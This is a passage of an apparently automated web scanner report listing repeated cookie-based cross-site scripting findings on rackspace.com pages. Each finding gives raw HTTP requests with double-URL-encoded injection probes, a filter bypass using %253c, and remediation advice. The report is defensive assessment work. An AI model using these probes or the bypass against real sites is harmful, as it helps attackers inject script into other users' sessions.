Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/exchange_hosting/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8bad4f%2527%253bb865cd9355d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6b8c%2527%253b214229cb995 was submitted in the IS_UASrackuid cookie. This input was echoed as a6b8c';214229cb995 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/exchange_hosting/on_your_mobile/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a6b8c%2527%253b214229cb995; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40a71%2527%253b1860f0779c0 was submitted in the IS_UASrackuid cookie. This input was echoed as 40a71';1860f0779c0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/exchange_hybrid/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f840a71%2527%253b1860f0779c0; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a82cd%2527%253b877d852156d was submitted in the IS_UASrackuid cookie. This input was echoed as a82cd';877d852156d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/migrations/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a82cd%2527%253b877d852156d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97cf2%2527%253bf7509b3957e was submitted in the IS_UASrackuid cookie. This input was echoed as 97cf2';f7509b3957e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/rackspace_email?MMP=loginpg_hosted_email HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f897cf2%2527%253bf7509b3957e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d103%2527%253bcc842ca331 was submitted in the IS_UASrackuid cookie. This input was echoed as 8d103';cc842ca331 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/rackspace_email/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f88d103%2527%253bcc842ca331; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc28a%2527%253bb741c739f4f was submitted in the IS_UASrackuid cookie. This input was echoed as fc28a';b741c739f4f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/rackspace_email/on_your_mobile/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8fc28a%2527%253bb741c739f4f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 898e2%2527%253bd50409f66e2 was submitted in the IS_UASrackuid cookie. This input was echoed as 898e2';d50409f66e2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting_service_planning_guide/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8898e2%2527%253bd50409f66e2; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5960e%2527%253b0f523ca6614 was submitted in the IS_UASrackuid cookie. This input was echoed as 5960e';0f523ca6614 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_industry_leadership/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f85960e%2527%253b0f523ca6614; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b69bc%2527%253b0183427d981 was submitted in the IS_UASrackuid cookie. This input was echoed as b69bc';0183427d981 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_marketing_solutions/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b69bc%2527%253b0183427d981; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddfd7%2527%253b9acdb14780b was submitted in the IS_UASrackuid cookie. This input was echoed as ddfd7';9acdb14780b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_provider/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8ddfd7%2527%253b9acdb14780b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5cb0%2527%253b984f54e5a1f was submitted in the IS_UASrackuid cookie. This input was echoed as b5cb0';984f54e5a1f in the application's response.
